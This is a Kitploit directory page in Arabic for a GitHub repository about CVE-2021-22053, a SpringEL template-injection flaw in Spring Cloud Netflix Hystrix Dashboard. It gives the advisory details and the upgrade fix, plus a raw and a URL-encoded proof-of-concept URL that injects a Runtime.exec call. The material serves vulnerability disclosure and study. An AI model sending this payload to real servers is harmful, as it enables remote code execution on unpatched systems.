Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 — Spring Cloud Netflix Hystrix Dashboard ثغرة حل القالب CVE-2021-22053 | Kitploit
أدوات/GitHubGitHub/seccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبالتعلم والتعليم
GitHubseccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

Spring Cloud Netflix Hystrix Dashboard ثغرة حل القالب CVE-2021-22053

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
378منذ 3 سنواتتمت المراجعة من قبل Kitploit

CVE-2021-22053: ثغرة حل القوالب في لوحة تحكم Hystrix من Spring Cloud Netflix

الشدة

عالية

الجهة الموردة

Spring من VMware

الوصف

التطبيقات التي تستخدم كلاً من spring-cloud-netflix-hystrix-dashboard و spring-boot-starter-thymeleaf تتيح طريقة لتنفيذ كود يتم إرساله داخل مسار URI أثناء حل قوالب العرض. عندما يتم إرسال طلب إلى /hystrix/monitor;[بيانات مقدمة من المستخدم]، يتم تقييم عناصر المسار التالية لـ hystrix/monitor كتعبيرات SpringEL، مما قد يؤدي إلى تنفيذ كود.

منتجات VMware المتأثرة والإصدارات

الشدة عالية ما لم يُذكر خلاف ذلك.

  • Spring Cloud Netflix
    • 2.2.0.RELEASE إلى 2.2.9.RELEASE
    • الإصدارات الأقدم غير المدعومة متأثرة أيضًا

التخفيف

يجب على مستخدمي الإصدارات المتأثرة تطبيق التخفيف التالي: يجب ترقية المستخدمين إلى 2.2.10.RELEASE+. لا توجد خطوات أخرى ضرورية. الإصدارات التي أصلحت هذه المشكلة تشمل:

  • Spring Cloud Netflix
    • 2.2.10.RELEASE+

الإسناد

تم تحديد هذه الثغرة والإبلاغ عنها بمسؤولية بواسطة threedr3am من مختبر SecCoder Security ([email protected]).

المراجع

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

التاريخ

2021-11-17: نشر التقرير الأولي للثغرة.

POC

الخام:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/

المشفر:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/

ملاحظة: لا يمكن تضمين الشرطة المائلة '/' في الأمر.

تنزيل الأداة